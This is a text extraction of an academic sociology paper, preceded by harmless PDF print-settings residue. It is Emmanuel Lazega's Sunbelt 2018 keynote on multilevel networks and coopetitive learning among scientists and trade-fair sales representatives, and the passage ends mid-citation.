<FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_h7bzshd4nffpbkpjsz4lxtgzea ---- © 2020 Author. This work is licensed under the Creative Commons Attribution 4.0 License (https://creativecommons.org/licenses/by/4.0/). CONNECTIONS Issue 1 | Vol. 40Article | DOI: 10.21307/connections-2019.013 60 Embarked on social processes (the rivers) in dynamic and multilevel networks (the boats) Emmanuel Lazega* Institut d’Etudes Politiques de Paris, IUF, CSO-CNRS, 19 rue Amélie, 75007 Paris, France. *E-mail: emmanuel.lazega@ sciencespo.fr Text of keynote presentation at the Sunbelt XXXVIII in Utrecht, 2018. Revised and resubmitted for publication in Connections. 12 May 2020. Abstract This paper is the written text underlying the keynote presentation at the Sunbelt XXXVIII in Utrecht, 2018. It presents a neo-structural approach to social processes in the organizational society and the usefulness of the analyses of multilevel networks to understand how we navigate these processes and are made aware of them when we face cooperation dilemmas. Empirical illustrations look at how multilevel networks and relational infrastructures are useful to research a process such as coopetitive learning in science, business and government. A con clusion focuses on the role of multilevel relational infrastructures in institutional entrepreneurship, social change and politics, as well as on our responsibility to develop our knowledge of these social processes and multilevel relational infrastructures as open science. Keywords Social processes, Cooperation dilemmas, Multilevel networks, Multilevel relational infrastructures, Coopetitive learning, Institutional entrepreneurship, Politics, Open science, Neo-structural sociology. Embarked on social processes in the organizational society The main social processes in which sociology has been interested since the nineteenth century are solidarity and exclusion; deviance, control and conflict resolution; regulation and institutionalization; and learning and socialization. To say that these processes are social is to say that much of their deployment is always problematic and beyond our individual control. Even when we can influence one of their episodes or components, we are embarked in/by them, cannot stop them, and necessarily navigate their tumultuous course with others. Together, these processes can be considered to be social capital of the collective. Navigating our course in these processes with others makes everyone interdependent, and interdependencies are thus too important to be left unorganized. We are thus reminded of this navigation each time we meet cooperation dilemmas. To manage these dilemmas, individuals and societies try to organize these interdependencies with structure and culture; for example, with relational infrastructures reflecting vertical differentiations (forms of status), horizontal differentiations (forms of division of work) and norms of behavior and exchanges associated with position in the structure created by these differentiations. Structure, culture and agency as analytically distinct operate in conjunction with each other and drive each other’s evolution. Among indicators of these interdependencies, we find impersonal interactions and personalized relationships. Today, the focus is on personalized relationships and relational infrastructures, especially multilevel relational infrastructures. We define rela- tionships as channels for resources and moral commitments with the exchange partners. Specified by culture and agency, relationships combine into relational patterns and these patterns are the relational infrastructures shaping the social processes identified above. Relational infrastructures are the backbones of certain forms of organized collective action and production, which we call collegial (not to be confused with congenial). Since all the social processes 61 CONNECTIONS identified above have a relational dimension, studying them from the perspective of this relational dimension adds to their sociological understanding. The study of the association between position in the social structure and behavior, as revisited by White et al. (1976) and developed in particular by INSNA members, has contributed to understanding this navigation. When personalized relationships are stabilized, they form relational infrastructures (for example, dimensions of status measured by centrality, or division of work approached with blockmodels) that both help members of the collective manage their cooperation dilemmas and constrain them. They represent complex opportunity and constraint structures (White, 1970) nested in social classes that, at some periods in history, facilitate mobilizations, accumulation and opportunity hoarding (Tilly, 1998). This new structural analysis was bolstered during subsequent decades by specialized statistical models for networks as dependent variables. In these models exogenous effects, i.e. based for example on class, gender, ethnic affiliations, occupation, formal status, etc., bring into the picture the wider social context and its conflicts to understand and explain the formation of networks at different levels of granularity: dyadic (with p2 models, e.g., Van Duijn et al., 2004), triadic or higher order levels (with ERGMs, e.g., Pattison and Wasserman, 1999; Snijders et al., 2006; Wasserman and Robins, 2005), and thus of relational infrastructures. This rigorous methodology has helped to analyze and to contextualize the deployment of the social processes and their navigation. Further sophistication and stabilization of these analyses look at the co-evolution of these networks, behaviors, normative choices and positions (e.g. dynamics in Snijders’, 1996, 2005; Snijders and Steglich (forthcoming), analyses of longitudinal network data) where networks are both contexts and contextualized. This neo-structuralism recognizes that the management of interdependencies and cooperation dilemmas have certainly always been sophisticated and complex. However, as shown by modern sociologists – from Weber (1978) to Presthus (1962), Coleman (1982), Perrow (1991), Lindenberg (1997), Wittek (2017), Wittek and Van de Bunt (2004), Wittek and Van Witteloostuijn (2013) – the organization of interdependencies is today further characterized by the fact that we now live in an “organizational society.” In this organizational society, the meso-level of social order (and therefore the construction of the macro level) is dominated by those who control organizations as “tools with a life of their own” (Selznick, 1949, 1957) that tend to “absorb societal functions” (Perrow, 1991). This perspective focuses the attention on the necessity to factor into the analyses – of relational interdependencies and infrastructures, social pro- cesses and their navigation – much more than in the recent past, the fact that society is stratified by superposed levels of organized collective action. The study of structure, culture and agency has to take this vertical, multilevel dimension of social phenomena much more into account. Understanding navigation of social processes with the analyses of multilevel networks The concept of duality (Breiger, 1974; further developed by Fararo and Doreian, 1984 and many others), in which individuals and groups/organizations co-constitute each other, is central to understand this vertical and multilevel dimension of the organizational society. In particular, it can mean that position in the organizational society is built from at least two levels of collective agency: inter-individual and inter- organizational. To revisit theories of tumultuous and often violent social processes and their collective navigation in the organizational society, we argue that it is useful to look at this navigation at least at two superposed levels of collective agency, simultaneously. A level is defined here as a system of collective agency with the same vertical and horizontal differentiations between members as those considered in the previous section (i.e. multiple dimensions of socio economic status and forms of division of work). Actors at each level can be the individuals (affiliated in the organizations) or organizations (companies, government administrations, professions, associations, cooperatives, etc., affiliating individuals). Individuals build relationships within and across organizational boundaries; and organizations build an inter-organizational field or system (industry, policy domain, etc.) in Selznick’s (1949) sense of “dynamic configuring fields”. At each level, we find all the generic social processes and the relational infrastructures that help navigate them. Each level can be represented as a network that is homogeneous with respect to type of actors, as in Figure 1, and these structures can be analyzed as made up of units of analysis that are pairs of person-organization, in which the person is affiliated in the organization. In general terms, looking at the characteristics of such pairs helps to further understand position in the social structure, i.e. individuals dually positioned in superposed levels of collective agency. Duality as co-constitution of one level with the other can be further modelled here using what Snijders (2016) calls “analysis of multilevel networks” 62 Embarked on social processes in dynamic and multilevel networks (AMN), as differentiated from “multilevel network analysis” (MNA). In this approach, each level is context for the other and represents a form of collective agency (Wasserman and Iacobucci, 1991; Parcel et al., 1991; Lazega, 1994; Lazega et al., 2008; Lazega and Snijders, 2016). Such networks overlap and coevolve in complex ways, and these overlaps become indicators of meso-level context for individual relational strategies across boundaries, but also for the construction of macro-level structures (social stratification and inequalities). Each level is context for the other. Statistical models helping explore the emergence and determinants of such structures are provided, for example, by Snijders and Bosker (2012), Koskinen et al. (2017), Wang et al. (2013, 2016), Žiberna (2014), Žiberna and Lazega (2016), Zappa and Lomi (2015), Tranmer et al. (2016). Today I would like to report some of our explorations of how these multilevel dynamics work, based on datasets following this linked design. Economic sociology offers many example of such forms of coopetition (Brailly et al., 2018, provide an overview), understood as paradoxical cooperative competition. They show how these overlap and their management always matter in understanding markets, more generally contexts where coopetition is vital. In this domain, this multilevel perspective has provided a new network boundary specification technique, as illustrated and developed by Eloire (2010), Eloire et al. (2011), Penalva-Icher (2010), Oubenal (2015), Piña-Stranger and Lazega (2011), Brailly (2016), Favre et al. (2016), who all look at how competitors cooperating in markets navigate social processes with relational infrastructures. First, they list all organizations active in the field of study, and their interdependencies. Second, they list the main individuals who are affiliated in these organizations and know about the latters’ strategies, policies, interdependencies, exchanges, coordination efforts and capacity for resilience. This technique samples individuals, with all the limitations of samples, but is nevertheless useful as an exploratory technique when the researcher knows that the sample represents an organized community with inter-individual and inter-organizational collaborations. Third, they elicit interdependencies between these individuals active in the field with data on their activities, division of work, specialties, productivity and performance. This approach has identified overlooked positions and processes, for example the position of vertical linchpins (actors who are active at two levels, simultaneously), dual alters, extended opportunity structures, multilevel Matthew effects, etc. If multilevel agency and strategies become so visible in the organizational society, it is preci- sely because they help actors manage both inter- dependencies and conflicts with each other, i.e. coopetition. If the organizational society generalizes coopetition, it is also likely to encourage a form of reflexivity that makes multilevel agency an explicit concern. Coopetition itself as an example of this general statement about social life, i.e. coorientation and coordination among actors who still jockey for positions and compete for resources, is as widespread as soccer games. However, in capitalist economies – where the lower the levels of social stratification, the Figure 1: Superposed levels of collective agency: inter-individual network, inter-organizational network, and affiliation network. In this multilevel, linked-design structure, the two levels are each made up of different types of units. In the analysis of multilevel networks (AMN), as understood here, the unit of analysis is the individual-organization pair. (See ‘Catching up with the big fish in the big pond’,Social Networks, 2008, with Marie Jourda, Lise Mounier & Rafael Stofer) 63 CONNECTIONS more open, direct and systematic the competition forced upon their members – coopetition acquires a different meaning. In many coopetitive fields, for example, individual employees are put in charge of seeking, on a personal basis, information and advice from other employees belonging to different, competing companies, thus figuring out ways for their respective companies to coordinate with one another, i.e. to become relatively friendly competitors instead of engaging in cutthroat competition. Thus, a multilevel approach to collective action dynamics in the organizational and market society can identify ways in which companies compete in public, while their employees cooperate in private. In theory, one should deal with such broad issues process by process, relational infrastructure by relational infrastructure, each dataset bringing its additional insights. Instead, I will focus here on one single process, coopetitive collective learning, in three different settings. This complexifies even further the tradition of studying learning through advice networks (see for example Agneessens and Wittek, 2012; Barbillon et al., 2016; Glückler et al., 2017; Krackhardt, 1990; and many others). These case studies flesh out this multilevel perspective with the AMN: the first looks at multilevel coopetition in science; the second in business; the third in government. In these cases, we identify the multilevel relational infrastructures that help coopetitors navigate the focal social process that makes collective action among rival peers possible. Examples: navigating coopetitive learning in science, business and government The first example is a study of collective learning and coopetitive performance among public scientists, a population of top cancer researchers in France in 1999−2000. This case in point focuses on collective learning among highly competitive actors. All are part of science as a multilevel production system with collective action at each level. Individuals are researchers, all “sublime” in different ways (eight papers per year in internationally visible journals scanned by Cancerlit – later merged into Pubmed – for three years in a row between 1996 and 1998). They work in different research laboratories. The two different levels of collective agency are, first, five different inter- individual level advice networks supporting the work of these scientists; and second the inter-organizational level captured by seven networks of resource interdependencies between laboratories (recruitment of postdocs, shared expen sive technology, joint funding and research projects, etc.) supporting the collective projects of these respective organizations. The dominant specialty is still hematology-immunology that was able to associate more systematically with fundamental research since the 1970s. Indeed, more than a generation earlier, they had collectively won a race to learn and appropriate molecular biology, and to coopetitively share their experience of using its techniques1. Multilevel position and relational infrastructures Multilevel relational infrastructures, especially multi level status, mainly helped specific researchers navigate the coopetitive learning process. Here we roughly identify high and low multi-level status by taking the median in indegrees between individuals (i.e. central – the big fish) and less central (the little fish, below the median), and the same for organizations, combined with size (the big and the small ponds). We can thus identify four positions in multilevel status: the big fish in the big ponds (BFBP), the BFSP, the LFBP and the LFSP. On average performances of these categories differ. Impact factor (IF) scores are unreliable as measurement of quality of work, but it is nevertheless interesting in our exploratory approach to look at what story they tell. This story is that performances of the BFBP are higher, which is no scoop, but also that over time only the LFBP catch up with the BFBP2. This makes sense: only the large and central laboratories have enough resources to help their young postdocs and researchers remain in this highly competitive race. This suggests that characteristics of organizations count more for IF performance than characteristics of individual members who navigate the coopetitive system. Size and centrality of their laboratory, as well as resources, seem to matter more than their own individual centrality in the advice networks in this segment of the profession. Thus, organizations influence and dominate the coopetitive learning process, especially in favor of the BFBP with high epistemic status, as well as the LFBP. Organizations are that important because they provide resources, 1Retrospectively, we know that this social system was already in decline. Hematologists-immunologists specialized in leukemia still dominated this research field, but the invention of genetic sequencing, then its use by various applied specialties including epidemiological research, was going to extend medical knowledge on solid tumors. 2Napoleon used to say that in politics it is better to be first in one’s provincial village than second in Paris. In science, it seems to be the opposite. 64 Embarked on social processes in dynamic and multilevel networks functional coordination, but also the social discipline needed to navigate the social processes at hand. One indicator of this social discipline was made available to us thanks to measurement of the perceptions by these researchers of who among the others were their direct competitors. Our analyses showed that, under specific conditions, researchers seek advice from, and share experience with, colleagues whom they recognize as direct competitors (Lazega et al., 2017). This was the case almost only among hematologists – immunologists and their laboratories. They were able, more than other specialties, for historical reasons, to turn cutthroat competition into more manageable coopetition, in particular by creating and sustaining this social discipline thanks to multilevel relational infrastructures mentioned above. Figure 2 is based on a stochastic blockmodel of two networks (advice and identification of direct competitors), i.e. a model based on probabilities of advice relations between and within blocks conditioned on presence of direct competitors. In this system, when factoring in the direct competition network jointly analyzed with the advice network among peers, only one social niche was identified as capable of this feat. This single social niche in this system (Block 2 central in Figure 2) brings together hamatologists- immunologists. They were the only researchers whose relational infrastructure was helpful in terms of taming cutthroat competition and turning it into more or less friendly competition, thus facilitating the achievement of important results collectively and individually. This specialty was able to self-organize as a “social niche” (which is a relational infrastructure as defined above) over two generations, a block of scientist that not only brought together researchers with the same relational profile in this milieu, but also was capable of collective action as a cohesive group (Bernard et al., 2000). Inside the niche, social discipline was strong enough to stop competitors from sharing advice deliberately trying to mislead other members. In addition to resources, only this social niche of big ponds was able to provide this context and social discipline. Cross-level agency, overlaps, strategies and resilience But are organizations really thicker than individuals as determinants of such achievements? Our answer is yes if you measure their effect cross-sectionally, at least at one point in time. Only the LFBP with the right relational behavior learn to catch up with the BFBP over time as part of their heavily relational socialization (Lazega, 2014). Indeed variations among the LFBP (especially the young researchers looking for freedom and emancipation, as shown by Coromina Soler et al., 2011 and Ziherl et al., 2006) show that, in such multilevel systems, individual learning strategies matter too, not just their multilevel position. We measure these strategies by looking at the ways in which these scientists manage the overlaps between their own individual network and the network of their organization. We identified four types of overlaps as indicators of multilevel relational strategies: independent (no overlap, the researcher has relationships in the interindividual network that Figure 2: Seeking advice and learning from peers identified as direct competitors: managing coopetition with superposed social niches as a collective benefit of multilevel networks. Stochastic blockmodel based on the probabilities of advice relations between and within blocks conditioned on presence of direct competitors. The two kinds of links, seeking advice and identifying as a direct competitors, are dependent. In the second block there is a higher proportion of members seeking advice from each other and calling each other direct competitors than in the two other blocks. Node size proportional to block size, N = 126. (See ‘Effects of competition on collective learning in advice networks’, Social Networks, 2016, with Avner Bar-Hen, Pierre Barbillon, Sophie Donnet) 65 CONNECTIONS are members of laboratories in which his/her own laboratory does not have relationships at the inter- organizational level); individualist and collectivist have more or less partial overlaps of different sizes; and the fusional strategy means that the researcher, being a good soldier of his/her lab, has relationships in the interindividual network only among members of labs in which his/her own lab has relationships at the inter-organizational level. It is interesting to note that the strategy that characterizes the “winners” in this system (the BFBP and the LFBP) is the individualist strategy. The radical independentist strategy, in particular, seems to be a mistake in this particular context – message for the younger colleagues in the audience. This analysis, as exploratory as it is, strongly suggests that things do not just happen for those in the right place at the right time: individuals in a coopetitive milieu are also strategic in their relational choices. These individual strategies matter in the interplay between levels, but agency and strategy matter particularly over time. A multilevel approach shows in this case that the resilience of personal relationships, i.e. their deliberate maintenance over long periods, explains in part the effectiveness of these strategies, especially when organizations disappear. In our case in point, for many reasons, almost none of the laboratories in which we interviewed these resear- chers and directors still exist today as organized entities: technology and methods have changed with genetic sequencing and genomics, turnover of members and directors have created new structures that have replaced to ones we observed. And nevertheless, the density of co-publication ties between members of this population of researchers is almost as strong 17 years later in 2016 as it was in 1999 (year of fieldwork). In this case in point, as shown by the comparison, in Figure 3, between the density of the co-publication networks among these scientists in 1999 and in 2016, the resilience of personal coworkers’ relationships is impressive. In total, 17 years after fieldwork, all laboratories had disappeared as organized entities, and researchers were in different laboratories. But they still published together, in part with the same colleagues as in 1999. To put it in a simplified way: combined collective learning and personal ties last long after organizations that brought these scientists together disappear. This “long” term resilience of personal co- publication ties, combined with strategies of invest- ment in social discipline and relational infra structures, pay off. This observation limits very much the idea that organizational characteristics have more effect on performance than individual characteristics and agency in this context. The opportunity structure represented by organizations needs personalized ties within this milieu in order to become an important asset and determinant of performance. But one has to look at this effect over time to realize it. Position and agency combined in extended opportunity structures: discreet kinds of inequalities If both position and agency matter separately, how do they matter together as determinants of individual performance in this setting? Another way in which organizations matter, in addition to providing direct access to resources and a form of social discipline, is in their capacity and willingness to extend the opportunity structure of their members. This means rewarding (from the perspective of the director/ manager of the organization) their members who select the “right” multilevel relational strategies and align with the multilevel relational infrastructures. Which of the three strategies that maintain an overlap between the inter-individual and the inter-organizational networks is rewarded by which manager is an underexplored research question. Indeed, one more reason why organizations are somewhat thicker than individuals when we look at determinants of this kind of performance is that they can extend members’ opportunity structures by providing access to what we call dual alters, especially dual alters with complementary resources. We have coined the added value for performance derived from indirect, multilevel, manager-enhanced access to resources accruing from an extended opportunity Figure 3: The “long” term resilience of inter-individual collaboration ties over 17 years, long after the different organizations in which they worked have disappeared. (Bar-Hen & Lazega, forthcoming). 1999 2016 66 Embarked on social processes in dynamic and multilevel networks structure “network lift from dual alters” (Lazega et al., 2013). We call dual alters actors in the system whom the focal actor does not reach on his/her own, but who can be introduced to the focal actor by his/her director/manager. As shown in Figure 4, network lift from dual alters is equivalent to closing a multilevel 3-path. When directors/managers share relational capital to give access to dual alters, their members’ performance increases – especially when the dual alters are rich with resources complementary to that of the focal actor. When this occurs, the LFBP catch up with the BFBP. Figure 5 visualizes the potential that dual alters represent. It shows all the dual alters with complementary resources accessible to researchers for coopetitive learning and collaborations through their inter-organizational ties. It is interesting to notice that 50% of the BFSP are both directors and researchers closing multilevel 3-paths for others, while their IF scores still decrease over time. One interpretation of this effect could be that their commitment to their laboratory as a whole comes with this individual cost since they no longer work for themselves but for the collective. It is worth mentioning that this effect increases when we take into account an additional level, i.e. the personal collaboration team of the researcher and its characteristics (Lazega and Jourda, 2016). We then have the following different levels: the first level is the focal researcher’s personal collaboration team represented as an ego network (as in Burt’s (2005), Burt and Merluzzi (2014) “within group” entity); the second level is the complete advice network between Figure 4: How can inter-organizational ties be that important to members’ multilevel status? Dual alters induced relational capital accessed thanks to closing multilevel 3-paths. By providing an extended opportunity structures: “network lift” from “dual alters” and a 3-level Matthew effect. They provide a social discipline across organizational boundaries, a discipline that makes it possible to seek advice from direct competitors (otherwise risky). Director 1 Director 2 Researcher i Dual alter k (See ‘Network lift from dual alters’, European Sociological Review, 2013, with Marie Jourda and Lise Mounier) Figure 5: A potential to realize through multilevel 3-paths: picture of all dual alters (in red) accessible to researchers (in green) for coopetitive learning and collaborations through their inter- organizational ties (in blue). Green nodes are actors i. First circle of blue nodes are organizations in which actors i are affiliated. Second circle blue nodes are organizations with which first circle blue nodes are connected. Red nodes are dual alters accessible to members (green nodes i) through inter- organizational networks. For the clarity of the picture, ties among members i (whether as focal actors or as dual alters) are not visualized. (See ‘Network lift from dual alters’, European Sociological Review, 2013, with Marie Jourda and Lise Mounier) 67 CONNECTIONS all focal researchers in the field; and the third level is the inter-organizational network of laboratories in which these focal researchers are affiliated. The more dual alters with complementary resources one can reach and exchange with, and the denser the collaboration ego network, the higher the performance because the more likely the focal actor is to benefit from the equivalent of a 3-level Matthew effect. Indeed in multilevel systems, directors/managers can induce access to dual alters by closing such multilevel 3-paths. Thus network lift from dual alters is not only created by closing such complex paths. It is also derived from a specific kind of cumulative advantage. We pictured this 3-level Matthew effect with a paraglider with three levels (Lazega and Jourda, 2016). Incidentally, one of the questions one could ask in business schools is why managers do not create this connection with dual alters for their subordinates more often. The answer might be that this extension of opportunity structures of subordinates requires that managers do not perceive their relationship with their subordinates as cutthroat competitive. The combination of specific multilevel relational strategies by individual members and the closing of multilevel 3-paths by the manager can transform a latent, extended opportunity structure, into a social process that is a collective asset shared and useful to navigate the coopetitive learning process. This special dimension of opportunity structures, which we call extended opportunity structures, thus matters for navigating social processes on multilevel, socio- organizational networks. Multilevel temporalities and synchronizations Our second example is a study of collective learning and coopetitive survival in business3, in particular among sales representatives with precarious jobs in a trade fair for regional buyers and global sellers of television programs. Economists of culture show that this global industry is structured as an “oligopoly with fringes.” A small number of large multinational firms, the Majors, dominate the global market using scorched-earth tactics. They empty the pockets of the largest clients, for example by selling new and successful series, such as – at the time – “The Borgia,” while giving away for free, as an extra, enough hours of Mickey Mouse to fill the broadcasters’ grids for three hours per afternoon for an entire year. Such tactics undermine the official market where thousands of smaller producers with new and creative programs have to fight for leftover crumbs. Looking at this market as a multilevel structure based on the linked design helps visualize it as in Figure 6. Brailly et al. (2016) and Favre et al. (2016) Figure 6: A trade fair as epistemic and economic space represented with multilevel networks of coopetitive learning among sales representatives for contracting companies. Result of successive visualizations by Julien Brailly, Saint-Clair Chabert-Liddell and David Schoch of a discussion network among sales representatives during year 1 (lower level) and the contract network signed the following year between the companies in which these sales representatives were affiliated (upper level). Many small companies, the units on the outer upper circle, did not sign any contract that year and thus find themselves isolated on this outer upper circle, as if they were watching the economic action driven by the more central companies doing business in the centre. The density of the lower level network represents the “buzz” network of this trade fair. For color codes and for a substantive explanation of this graph, see Brailly (2016; Brailly et al., 2016). (See ‘Markets as Multilevel Networks’ (2015) with Julien Brailly, Guillaume 